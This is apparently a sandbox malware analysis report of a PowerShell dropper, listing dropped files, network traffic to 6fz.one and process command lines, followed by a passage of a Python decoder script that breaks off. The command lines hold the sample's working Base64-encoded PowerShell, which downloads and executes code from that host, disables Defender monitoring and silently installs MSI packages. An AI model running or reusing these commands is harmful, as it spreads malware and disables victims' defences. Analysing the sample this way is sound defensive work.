SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\hjp55l32\CSC19AB26A2AE5E4078BE27BAEBF17BEA80.TMP
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: MSVC .res
Category: dropped
Size (bytes): 652
Entropy (8bit): 3.1215042136699678
Encrypted: false
SSDEEP: 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry9dak7YnqqeyPN5Dlq5J:+RI+ycuZhNndakSeyPNnqX
MD5: 20F5A6AACD0F664991F066FFA2D3E58F
SHA1: 49C18F53F445D00FC9785C8B2A1488250F773E8A
SHA-256: 0164ABDBF65CD2C8BFBE1073B449AC787196947ED178F6BFD750CFAA222D6C99
SHA-512: 4E46156D419DB0E75850972E854B327868FADD8C4912A071FA782777DDBECC079225FE5994BB07E1A21D5F66C5BB1C1F50C92556622FE4B78433E994E8B42441
Malicious: false
Preview: ...... L...<...... 0...... L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...... ?...... D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...... S.t.r.i.n.g.F.i.l.e.I.n.f.o...... 0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n...... 0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.j.p.5.5.l.3.2...d.l.l.....(... ..L.e.g.a.l.C.o.p.y.r.i.g.h.t...... D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.j.p.5.5.l.3.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0... 0...0...0...

C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.0.cs
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 354
Entropy (8bit): 5.106255627163809
Encrypted: false
SSDEEP: 6:V/DsDrDCSvSKgF+SAUF3SR9QbKHDHtLDMWfDoFSRFQgLluLiA:V/DGrOEgFw9IihVkEFQwu1
MD5: 5CC66596055771B708C426B09785ED18
SHA1: FE11BE68B5F5F01304E2C6B62458BA70CCC9A575
SHA-256: 530C7292814FA916AA2846672D0BD17CB4BA54CB8F4F61B9D84E01A51B857C08
SHA-512: DC0C9385A85ADE45584FC782DE2AB285D5CEB535D0EF6D19B610E34C1FDE5E6E76FC88D0B6B0E9F922562C4FE26AAACCF6204FAE5053E3679F3A104CBF2DFD5C
Malicious: false
Preview:
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;
    public static class PF88dNcdsDDqe7Zf
    {
    [DllImport("msi.dll", CharSet=CharSet.Auto)]
    public static extern int MsiInstallProduct(string packagePath, string commandLine);
    [DllImport("msi.dll")]
    public static extern int MsiSetInternalUI(int dwUILevel, IntPtr phWnd);
    }

C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.cmdline
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 371
Entropy (8bit): 5.282666538949866
Encrypted: false
SSDEEP: 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fLTGzxs7+AEszI923fLTb:p37Lvkmb6KzTSWZE2TX
MD5: FF7F7C72C43FCBB7A6CAF84A179E3F5C
SHA1: FF359B4613CA625896FF99FAAD1BEE78AA593C34
SHA-256: AE4777AEAFFD6C17E1D4DB8FF05CCE3CB0040AD29C149583A9F0CCB08096A74C
SHA-512: 485544D5ED120279FC159FEBED5AB05694DA76F4E01CE8C8C9F685578422947FBF89B716A8649D20AAC82C487C9B4794F9DE45ED3EE7A8F4AC1CA3ACC9A2DE7C
Malicious: true
Preview: /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.dll" /- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.0.cs"

C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.dll
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3072
Entropy (8bit): 2.867930341093404
Encrypted: false
SSDEEP: 24:etGSVmp2YYSeVx8jdg2kOWG8sgChwC4tkFVhjJv6lStI+ycuZhNndakSeyPNnq:6VNY28OLG8sjhRFVhtvnt1ulnda3eeq
MD5: 4294A1E3E7F7BC241095D6D6FFE3A003
SHA1: 9D6A5D67E5EEDCEFE93B737A1264F89DA7DA86C5
SHA-256: 769F8D0900A2B96E23AB6027DC4B5DCC4F831AA8DC24003B976640DE58664457
SHA-512: CCD5544F9938B2785AB15AB501CF5EF131C94D4395EBD677F60F607DB75E03AB9D1011FE93E656B91E579E23194BFDED3A533458A7AD56AF96EB0A668F4B1335
Malicious: false
Preview: MZ...... @...... !..L.!This program cannot be run in DOS mode....$...... PE..L.....$a...... !...... #...... @...... @...... h#..S....@...... `...... H...... text...... `.rsrc...... @...... @..B..reloc...... `...... @..B...... BSJB...... v4.0.30319...... l...... #~...... 4...#Strings...... #US...... #GUID...... L...#Blob...... G...... %3...... 8.1...... ?...... Q...... b.....n.....z...... !...... $.....-.).....?...... Q...... (...... .hjp55l32.dll.PF88dNcdsDDqe7Zf.mscorlib.System.Object.MsiInstallProduct.MsiSetInternalUI.packag

C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.out
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: modified
Size (bytes): 412
Entropy (8bit): 4.871364761010112
Encrypted: false
SSDEEP: 12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5: 83B3C9D9190CE2C57B83EEE13A9719DF
SHA1: ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256: B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512: 0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious: false
Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0 for C# 5. Copyright (C) Microsoft Corporation. All rights reserved. This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

C:\Users\user\Documents\20210824\PowerShell_transcript.061544.OIWNDrfK.20210824052843.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 17279
Entropy (8bit): 5.408983345370473
Encrypted: false
SSDEEP: 384:vNYCUradT/fCGZkUGYyxNYCUradT/fCGZkUGY3NYCUradT/fCGZkUGYuNYCUradR:LUYHCGIYoUYHCGIYzUYHCGIYcUYHCGIA
MD5: 83FD51B1149F98A11FB029B564B0155E
SHA1: CB54266422A028216C32DF8A2EF8B79FCBF1D7A6
SHA-256: BB36E28303D11875A6852F84D8133C7F5856528F49706F8DD45076D9614FD038
SHA-512: 6EE34766E572B7991999F1A544B783BE6428E69C1E784F62FAD0DF5C3CE63220174A683BAEE310D3C6EB496CC0F8D436E8611BA6675798A2598CE42A09AAA59A
Malicious: false
Yara Hits: Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20210824\PowerShell_transcript.061544.OIWNDrfK.20210824052843.txt, Author: Florian Roth
Preview:
    **********************
    Windows PowerShell transcript start
    Start time: 20210824052855
    Username: computer\user
    User: computer\user
    Configuration Name: 
    Machine: 061544 ( NT 10.0.17134.0)
    Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzA

C:\Users\user\Documents\20210824\PowerShell_transcript.061544.hEH4MqJa.20210824053009.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 780
Entropy (8bit): 5.255202910492213
Encrypted: false
SSDEEP: 24:BxSA4kqPvN6x2DOXUWMa5WhHjeTKKjX4CIym1ZJXgTR:BZ4vN6oOEhqDYB1Z6
MD5: 4729DF34932C8014FC7E80B14FCE90CA
SHA1: F005B6E8450AFB1FFC122F797EEAB6A21B39302E
SHA-256: A80A355C2C06435E0220BB336AE85A70F471F486A574D851F5AEB1384856A0BD
SHA-512: 0AA92F865BDF28DCFFBF1A279927350E593BE6C94D85BCC1DB1E560E4C1E64D3B27B7EA7763C9CABB1AD97694E2E5FE6F568717FB093A8EACB8158A7D610AACC
Malicious: false
Preview:
    **********************
    Windows PowerShell transcript start
    Start time: 20210824053010
    Username: WORKGROUP\SYSTEM
    RunAs User: WORKGROUP\SYSTEM
    Configuration Name: 
    Machine: 061544 (Microsoft Windows NT 10.0.17134.0)
    Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -Seconds 900; Restart-Computer -Force
    Process ID: 6072
    PSVersion: 5.1.17134.1
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
    BuildVersion: 10.0.17134.1
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    **********************
    Command start time: 20210824053010
    **********************
    PS>Start-Sleep -Seconds 900; Restart-Computer -Force

C:\Users\user\Documents\20210824\PowerShell_transcript.061544.nhqpSbF5.20210824052819.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1227
Entropy (8bit): 5.581746074953716
Encrypted: false
SSDEEP: 24:BxSA4IIiDvBB6x2DOXiGf6kahJpQQ1fnJe2yGtcfPFWIHjeTKKjX4CIym1ZJXgIH:BZnI6v/6oOLikOJCQ1hByGtQPsIqDYBx
MD5: 88EFDD1D2A0FA7D8DBD70A5F3EE7939C
SHA1: 57ED8197E03D00422681DC34FBA7A071BC7B4E2A
SHA-256: B948E1EDD1FF702F54B7153A4C6C2837B64DE64B436D2093F433D4106609B09E
SHA-512: BAA59FB0F8A4947C498FC69CDBDD4AE06A7A29049C75ACF12345DC802EED75752350EA51BEF315ED4837E54C96C975B4FE32F2D8D7A2ADFD94CAADEAF884F0BE
Malicious: false
Preview:
    **********************
    Windows PowerShell transcript start
    Start time: 20210824052827
    Username: computer\user
    RunAs User: computer\user
    Configuration Name: 
    Machine: 061544 (Microsoft Windows NT 10.0.17134.0)
    Host Application: powershell.exe -nop -exec bypass -Encode DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADYAZgB6AC4AbwBuAGUALwBkAC4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACAAKAAiACQAYQAiACsAJwA2ACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADMAMAANAAoAfQANAAoA
    Process ID: 4996
    PSVersion: 5.1.17134.1
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
    BuildVersion: 10.0.17134.1
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    ************

\Device\ConDrv
Process: C:\Windows\SysWOW64\cacls.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 16
Entropy (8bit): 3.452819531114783
Encrypted: false
SSDEEP: 3:owt:owt
MD5: AC529FE6926F414CA912E854913B37D5
SHA1: EE123DCE12545E4431912A4F5D280D498B173EA9
SHA-256: 7EF170D8E74624C85D940142192E015D2CC66F53A0BA0C605D884F5A515BBAAC
SHA-512: 5C1640767913A90A230A1DB611214050A4F45667F731D97E0D6BCBB25AA526E809F75E1AF88E15314C4D91873C219EC955A540BFC0EBB6A3E94AAF75CAAA706D
Malicious: false
Preview: processed file:

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 24, 2021 05:28:38.522350073 CEST | 192.168.2.5 | 8.8.8.8 | 0xcfc1 | Standard query (0) | 6fz.one | A (IP address) | IN (0x0001)
Aug 24, 2021 05:29:19.459856987 CEST | 192.168.2.5 | 8.8.8.8 | 0x3b6 | Standard query (0) | 6fz.one | A (IP address) | IN (0x0001)
Aug 24, 2021 05:29:22.633817911 CEST | 192.168.2.5 | 8.8.8.8 | 0x7e3f | Standard query (0) | 6fz.one | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 24, 2021 05:28:38.561306953 CEST | 8.8.8.8 | 192.168.2.5 | 0xcfc1 | No error (0) | 6fz.one | | 104.21.0.250 | A (IP address) | IN (0x0001)
Aug 24, 2021 05:28:38.561306953 CEST | 8.8.8.8 | 192.168.2.5 | 0xcfc1 | No error (0) | 6fz.one | | 172.67.151.130 | A (IP address) | IN (0x0001)
Aug 24, 2021 05:29:19.494790077 CEST | 8.8.8.8 | 192.168.2.5 | 0x3b6 | No error (0) | 6fz.one | | 104.21.0.250 | A (IP address) | IN (0x0001)
Aug 24, 2021 05:29:19.494790077 CEST | 8.8.8.8 | 192.168.2.5 | 0x3b6 | No error (0) | 6fz.one | | 172.67.151.130 | A (IP address) | IN (0x0001)
Aug 24, 2021 05:29:22.673012018 CEST | 8.8.8.8 | 192.168.2.5 | 0x7e3f | No error (0) | 6fz.one | | 104.21.0.250 | A (IP address) | IN (0x0001)
Aug 24, 2021 05:29:22.673012018 CEST | 8.8.8.8 | 192.168.2.5 | 0x7e3f | No error (0) | 6fz.one | | 172.67.151.130 | A (IP address) | IN (0x0001)

HTTPS Packets

Columns: Timestamp, Source IP, Source Port, Dest IP, Dest Port, Subject, Issuer, Not Before, Not After, JA3 SSL Client Fingerprint, JA3 SSL Client Digest

Timestamp: Aug 24, 2021 05:28:38.665327072 CEST
Source IP: 104.21.0.250, Source Port: 443
Dest IP: 192.168.2.5, Dest Port: 49681
Certificate 1: Subject CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US; Issuer CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Not Before Sun Aug 22 02:00:00 CEST 2021; Not After Mon Aug 22 01:59:59 CEST 2022
Certificate 2: Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE; Not Before Mon Jan 27 13:48:08 CET 2020; Not After Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 54328bd36c14bd82ddaa0c04b25ed9ad

Timestamp: Aug 24, 2021 05:29:19.541357040 CEST
Source IP: 104.21.0.250, Source Port: 443
Dest IP: 192.168.2.5, Dest Port: 49682
Certificate 1: Subject CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US; Issuer CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Not Before Sun Aug 22 02:00:00 CEST 2021; Not After Mon Aug 22 01:59:59 CEST 2022
Certificate 2: Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE; Not Before Mon Jan 27 13:48:08 CET 2020; Not After Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0
JA3 SSL Client Digest: bd0bf25947d4a37404f0424edf4db9ad

Timestamp: Aug 24, 2021 05:29:22.710908890 CEST
Source IP: 104.21.0.250, Source Port: 443
Dest IP: 192.168.2.5, Dest Port: 49683
Certificate 1: Subject CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US; Issuer CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Not Before Sun Aug 22 02:00:00 CEST 2021; Not After Mon Aug 22 01:59:59 CEST 2022
Certificate 2: Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE; Not Before Mon Jan 27 13:48:08 CET 2020; Not After Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0
JA3 SSL Client Digest: bd0bf25947d4a37404f0424edf4db9ad

Code Manipulations

Statistics

Behavior


System Behavior

Analysis Process: cmd.exe PID: 3208 Parent PID: 5092

General

Start time: 05:28:17
Start date: 24/08/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /C 'powershell.exe -nop -exec bypass -Encode DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADYAZgB6AC4AbwBuAGUALwBkAC4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACAAKAAiACQAYQAiACsAJwA2ACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADMAMAANAAoAfQANAAoA'
Imagebase: 0x150000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Analysis Process: conhost.exe PID: 4356 Parent PID: 3208

General

Start time: 05:28:17
Start date: 24/08/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: powershell.exe PID: 4996 Parent PID: 3208

General

Start time: 05:28:18 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: powershell.exe -nop -exec bypass -Encode DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADYAZgB6AC4AbwBuAGUALwBkAC4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACAAKAAiACQAYQAiACsAJwA2ACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADMAMAANAAoAfQANAAoA Imagebase: 0x12f0000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET
Yara matches:
Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508337108.0000000005057000.00000004.00000001.sdmp, Author: Florian Roth
Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508576402.00000000050EF000.00000004.00000001.sdmp, Author: Florian Roth
Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508214967.0000000005009000.00000004.00000001.sdmp, Author: Florian Roth
Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508316918.0000000005052000.00000004.00000001.sdmp, Author: Florian Roth
Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.508383686.000000000506E000.00000004.00000001.sdmp, Author: Florian Roth
Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000002.00000002.507742791.0000000004DF2000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: high

File Activities

File Created

File Deleted

File Written

File Read

Registry Activities

Analysis Process: powershell.exe PID: 900 Parent PID: 4996

General

Start time: 05:28:40 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8ANgBmAHoALgBvAG4AZQAvAGQALgBwAGgAcAA/AGkAPQAxADYAIgANAAoAJABtAHMAaQBwAGEAdABoAEEATABMACAAPQAgAEAAKAAiACQAbQBzAGkAcABhAHQAaABBACIALAAiACQAbQBzAGkAcABhAHQAaABBACIAKQANAAoAJABOAGQAUwBVAEkAdwB1AHUAVwBuAHAAWQBIAHoARgB1ACAAPQAgAGcAZQB0AC0AcgBhAG4AZABvAG0AIAAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAUABGADgAOABkAE4AYwBkAHMARABEAHEAZQA3AFoAZgBdADoAOgBNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKAAiACQATgBkAFMAVQBJAHcAdQB1AFcAbgBwAFkASAB6AEYAdQAiACwAIgAiACkADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADYAMAANAAoAfQANAAoAdQBuAHQAaQBsACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABSAGUAZwBrAGUAeQBwAGEAdABoACAALQBuAGEAbQBlACAAUwB0AGEAeQBPAG4AVABvAHAAKQANAAoA Imagebase: 0x12f0000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high

File Activities

File Created

File Deleted

File Written

File Read
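Both powershell.exe command lines above carry their script as -EncodedCommand, which is Base64 over UTF-16LE text, not UTF-8. The script below is an added example for this report (it is not part of the Joe Sandbox output and not the sample's own code): it takes the two encoded strings exactly as they appear in the Commandline fields of PID 4996 and PID 900, removes the whitespace the report's line wrapping inserted, decodes them, extracts URLs and flags the Defender-tampering and MSI-staging calls. The indicator list and the function names are the example's own choices.

```python
"""Decode PowerShell -EncodedCommand payloads (Base64 over UTF-16LE) and pull out IOCs."""
import base64
import re

# Copied verbatim from the Commandline fields of powershell.exe PID 4996 (stage 1) and
# PID 900 (stage 2) in the report; the PDF wrapping inserted spaces, strip_b64() drops them.
STAGE1_B64 = """
DQAKAGYAbwByACgAJABpAD0AMQA7 ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQA
YQA9ACcAaAB0AHQAcABzADoALwAvADYAZgB6AC4AbwBuAGUALwBkAC4AcABo AHAAPwBpAD0AMQAnADsAaQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAA
bgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBk AHMAdAByAGkAbgBnACgAJABhACkAOwBNAHMAaQBNAGEAawBlACAAKAAiACQA
YQAiACsAJwA2ACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADMAMAAN AAoAfQANAAoA
"""
STAGE2_B64 = """
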